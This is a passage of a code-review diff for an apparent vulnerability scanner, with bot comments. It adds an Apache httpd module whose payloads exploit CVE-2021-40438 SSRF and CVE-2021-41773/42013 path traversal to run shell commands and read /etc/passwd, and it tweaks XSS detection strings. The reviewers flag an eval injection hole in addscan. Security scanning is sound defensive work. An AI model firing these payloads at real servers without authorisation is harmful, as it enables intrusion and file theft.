--- a/lib/tool/check.py
+++ b/lib/tool/check.py
@@ -34,8 +34,8 @@ def check_connect(url):
except requests.ConnectionError:
return False
except Exception as e:
- return False
# print(e)
+ return False
def check_res(res, md):
''' 检查poc误报
diff --git a/lib/tool/logger.py b/lib/tool/logger.py
index 617dda5..bf12b95 100644
--- a/lib/tool/logger.py
+++ b/lib/tool/logger.py
@@ -48,10 +48,19 @@ def logging_3(self, vul_info, status_code, res):
info_3 = self.logging_2(vul_info, status_code)
try:
- info_3 += color.red_ex(' [' + res.request.method + ' ')
- info_3 +=color.black_ex(res.request.url) + color.red_ex(']')
- if vul_info['data']:
- info_3 += color.red_ex(' [DATA ') + color.black_ex(res.request.body) + color.red_ex(']')
+ # * HackRequests
+ if (str(type(res)) == ""):
+ info_3 += color.red_ex(' [' + res.method + ' ')
+ info_3 +=color.black_ex(res.url) + color.red_ex(']')
+ if vul_info['data']:
+ info_3 += color.red_ex(' [DATA ') + color.black_ex(vul_info['data']) + color.red_ex(']')
+ return info_3
+ # * requests
+ else:
+ info_3 += color.red_ex(' [' + res.request.method + ' ')
+ info_3 +=color.black_ex(res.request.url) + color.red_ex(']')
+ if vul_info['data']:
+ info_3 += color.red_ex(' [DATA ') + color.black_ex(res.request.body) + color.red_ex(']')
except:
return info_3
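Review bot: The HackRequests detection `str(type(res)) == ""` compares against an empty string as rendered here, which is never true, so the new branch is dead and HackRequests responses fall through to `res.request.method`, raise, and are swallowed by the bare `except:`; if the original literal was a `<class '...'>` path lost in rendering, it is still brittle because any module rename breaks it. output.py in this same commit already refers to `HackRequests.response` directly, so `isinstance(res, HackRequests.response)` (with `from thirdparty import HackRequests` at the top of logger.py) or a duck-typed `hasattr(res, 'log')` is the reliable check. The same comparison is repeated in logging_4 and logging_6 and should be fixed in all three places.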
@@ -60,21 +69,32 @@ def logging_3(self, vul_info, status_code, res):
def logging_4(self, vul_info, status_code, res):
''' 日志4级, (框架名称+状态码+漏洞编号)+请求数据包 '''
info_4 = self.logging_2(vul_info, status_code)
+
try:
- info_4 += color.red_ex(' [Request')
- info_4 += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str)
- info_4 += color.black_ex('\n' + 'Host' + ': ' + self.get_domain(res.request.url))
-
- for key, value in res.request.headers.items():
- info_4 += color.black_ex('\n' + key + ': ' + value)
- if res.request.body:
- if (type(res.request.body) == bytes):
- info_4 += color.black_ex('\n\n' + res.request.body.decode())
- else:
- info_4 += color.black_ex('\n\n' + res.request.body)
-
- info_4 += color.red_ex('\n]')
- info_4 += color.reset('')
+ # * HackRequests
+ if (str(type(res)) == ""):
+ info_4 += color.red_ex(' [Request')
+ info_4 += color.black_ex('\n' + res.log.get('request'))
+
+ info_4 += color.red_ex('\n]')
+ info_4 += color.reset('')
+ return info_4
+ # * requests
+ else:
+ info_4 += color.red_ex(' [Request')
+ info_4 += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str)
+ info_4 += color.black_ex('\n' + 'Host' + ': ' + self.get_domain(res.request.url))
+
+ for key, value in res.request.headers.items():
+ info_4 += color.black_ex('\n' + key + ': ' + value)
+ if res.request.body:
+ if (type(res.request.body) == bytes):
+ info_4 += color.black_ex('\n\n' + res.request.body.decode())
+ else:
+ info_4 += color.black_ex('\n\n' + res.request.body)
+
+ info_4 += color.red_ex('\n]')
+ info_4 += color.reset('')
except:
return info_4
return info_4
@@ -97,11 +117,20 @@ def logging_6(self, vul_info, status_code, res):
''' 日志6级, (框架名称+状态码+漏洞编号)+请求包+响应头+响应内容 '''
res.encoding = 'utf-8'
info_6 = self.logging_5(vul_info, status_code, res)
+
try:
- info_6 = info_6[:-1]
- info_6 += color.black_ex('\n\n' + res.text)
+ # * HackRequests
+ if (str(type(res)) == ""):
+ info_6 = info_6[:-1]
+ info_6 += color.black_ex('\n\n' + res.text())
+
+ info_6 += color.red_ex('\n]')
+ # * requests
+ else:
+ info_6 = info_6[:-1]
+ info_6 += color.black_ex('\n\n' + res.text)
- info_6 += color.red_ex('\n]')
+ info_6 += color.red_ex('\n]')
except:
return info_6
return info_6
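Review bot: `info_6 = info_6[:-1]` assumes the string returned by `logging_5` ends with the closing `]`, but `logging_5` is not touched by this commit and there is no sign it has a HackRequests branch; if it returns early with a partial string for a HackRequests response, the slice removes an arbitrary last character and the `res.text()` body is appended to a truncated record. Confirm `logging_5` handles `HackRequests.response` (including `res.headers` access) before relying on this path, and use the same `isinstance` check as the other levels instead of `str(type(res)) == ""`, which as rendered never matches. `res.encoding = 'utf-8'` above the `try` is a no-op on a HackRequests response and could move into the requests branch.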
diff --git a/payloads/ApacheHttpd.py b/payloads/ApacheHttpd.py
new file mode 100644
index 0000000..97a33b1
--- /dev/null
+++ b/payloads/ApacheHttpd.py
@@ -0,0 +1,314 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+httpd是Apache超文本传输协议(HTTP)服务器的主程序: https://httpd.apache.org/download.cgi
+ Apache httpd扫描类:
+ 1. Apache httpd 2.4.48 mod_proxy SSRF
+ CVE-2021-40438
+ Payload: https://vulhub.org/#/environments/httpd/CVE-2021-40438/
+
+ 2. Apache httpd 2.4.49 路径遍历
+ CVE-2021-41773
+ Payload: https://vulhub.org/#/environments/httpd/CVE-2021-41773/
+ Paylaod: https://github.com/thehackersbrain/CVE-2021-41773/blob/main/exploit.py
+
+ 3. Apache HTTP Server 2.4.50 路径遍历
+ CVE-2021-42013
+ Payload: https://vulhub.org/#/environments/httpd/CVE-2021-42013/
+
+file:///etc/passwd
+file:///C:/Windows/System32/drivers/etc/hosts
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from thirdparty import requests
+from thirdparty import HackRequests
+from time import sleep
+
+class ApacheHttpd():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+ self.proxy = config.get('proxy')
+
+ self.app_name = 'ApacheHttpd'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cve_2021_40438_payloads = [
+ {
+ 'path': '?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://example.com/',
+ 'data': ''
+ },
+ ]
+
+ self.cve_2021_41773_payloads = [
+ {
+ 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash',
+ 'data': 'echo Content-Type: text/plain; echo; {}'.format(self.cmd)
+ },
+ {
+ 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash',
+ 'data': 'echo;{}'.format(self.cmd)
+ },
+ {
+ 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash',
+ 'data': 'echo Content-Type: text/plain; echo; {}'.format(self.cmd)
+ },
+ {
+ 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',
+ 'data': 'echo Content-Type: text/plain; echo; {}'.format(self.cmd)
+ },
+ {
+ 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',
+ 'data': 'echo;{}'.format(self.cmd)
+ },
+ {
+ 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',
+ 'data': 'echo Content-Type: text/plain; echo; {}'.format(self.cmd)
+ },
+ {
+ 'path': 'icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
+ 'data': ''
+ },
+ {
+ 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
+ 'data': ''
+ },
+ ]
+
+ self.cve_2021_42013_payloads = [
+ {
+ 'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash',
+ 'data': 'echo;{}'.format(self.cmd)
+ },
+ {
+ 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash',
+ 'data': 'echo;{}'.format(self.cmd)
+ },
+ {
+ 'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh',
+ 'data': 'echo;{}'.format(self.cmd)
+ },
+ {
+ 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh',
+ 'data': 'echo;{}'.format(self.cmd)
+ },
+ {
+ 'path': 'icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd',
+ 'data': ''
+ },
+ {
+ 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd',
+ 'data': ''
+ }
+ ]
+
+ def cve_2021_40438_scan(self, url):
+ ''' httpd的mod_proxy存在服务器端请求伪造(SSRF)
+ 该漏洞允许未经身份验证的远程攻击者使 httpd 服务器将请求转发到任意服务器
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'SSRF'
+ vul_info['vul_id'] = 'CVE-2021-40438'
+ vul_info['vul_method'] = 'GET'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2021_40438_payloads:
+ path = payload['path']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['target'] = target
+
+ try:
+ hack = HackRequests.hackRequests()
+
+ res = hack.http(
+ target,
+ method='GET',
+ timeout=self.timeout,
+ headers=self.headers,
+ proxy=self.proxy,
+ location=False
+ )
+ res.method = vul_info['vul_method']
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('This domain is for use in illustrative examples in documents.' in res.text())
+ and ('domain in literature without prior coordination or asking for permission.' in res.text())
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res
+ }
+ return results
+
+ def cve_2021_41773_scan(self, url):
+ ''' 在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷,
+ 攻击者可以使用路径遍历攻击将URL映射到网站根目录预期之外的文件
+ 在特定情况下, 攻击者可构造恶意请求执行系统命令
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'FileRead/RCE'
+ vul_info['vul_id'] = 'CVE-2021-41773'
+ # vul_info['vul_method'] = 'GET/POST'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2021_41773_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ if data:
+ method = 'POST'
+ else:
+ method = 'GET'
+
+ req = requests.Request(
+ method=method,
+ url=target,
+ data=data,
+ headers=self.headers
+ ).prepare()
+
+ req.url = target
+ session = requests.session()
+
+ res = session.send(
+ req,
+ timeout=self.timeout,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if ((self.md in check.check_res(res.text, self.md))
+ or ('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res
+ }
+ return results
+
+ def cve_2021_42013_scan(self, url):
+ ''' CVE-2021-42013是CVE-2021-41773的绕过, 使用.%%32%65/ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'FileRead/RCE'
+ vul_info['vul_id'] = 'CVE-2021-42013'
+ # vul_info['vul_method'] = 'GET/POST'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2021_42013_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ if data:
+ method = 'POST'
+ else:
+ method = 'GET'
+
+ hack = HackRequests.hackRequests()
+
+ res = hack.http(
+ target,
+ method=method,
+ data=data,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxy=self.proxy,
+ location=False
+ )
+
+ res.method = method
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if ((self.md in check.check_res(res.text(), self.md))
+ or ('/sbin/nologin' in res.text())
+ or ('root:x:0:0:root' in res.text())
+ or ('Microsoft Corp' in res.text())
+ or ('Microsoft TCP/IP for Windows' in res.text())
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res
+ }
+ return results
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.cve_2021_40438_scan, url=url),
+ thread(target=self.cve_2021_41773_scan, url=url),
+ thread(target=self.cve_2021_42013_scan, url=url)
+ ]
+
+httpd = ApacheHttpd()
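Review bot: `addscan` builds Python source from its arguments and hands it to `eval` (`eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))`), so a `url` or `vuln` value containing a double quote or a closing parenthesis is executed as code inside the scanner's own process; attribute lookup does the same job without that risk, `return thread(target=getattr(self, '{}_scan'.format(vuln)), url=url)`, and raises a clear `AttributeError` for an unknown `vuln` instead of a `SyntaxError`. In the three `*_scan` methods the bare `except:` folds every non-network failure — including a missing `text`/`status_code` attribute on the HackRequests response — into the generic 'Error' log line and also swallows `KeyboardInterrupt`; `except Exception:` preserves the best-effort logging without masking interrupts. The `requests.ConnectTimeout`/`requests.ConnectionError` handlers around `hack.http(...)` in `cve_2021_40438_scan` and `cve_2021_42013_scan` only fire if HackRequests raises those requests classes, which this hunk does not show; if it does not, every timeout is reported as 'Error' rather than 'Timeout'.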
diff --git a/payloads/Cisco.py b/payloads/Cisco.py
index beb3388..1d79419 100644
--- a/payloads/Cisco.py
+++ b/payloads/Cisco.py
@@ -73,7 +73,7 @@ def cve_2020_3580_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if ("alert('3580')" in res.text):
+ if ("onload=alert('3580')" in res.text):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
diff --git a/payloads/Django.py b/payloads/Django.py
index 08371ed..955003f 100644
--- a/payloads/Django.py
+++ b/payloads/Django.py
@@ -155,7 +155,7 @@ def cve_2017_12794_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if ("prompt('12794')" in check.check_res(res2.text, "prompt('12794')")):
+ if ("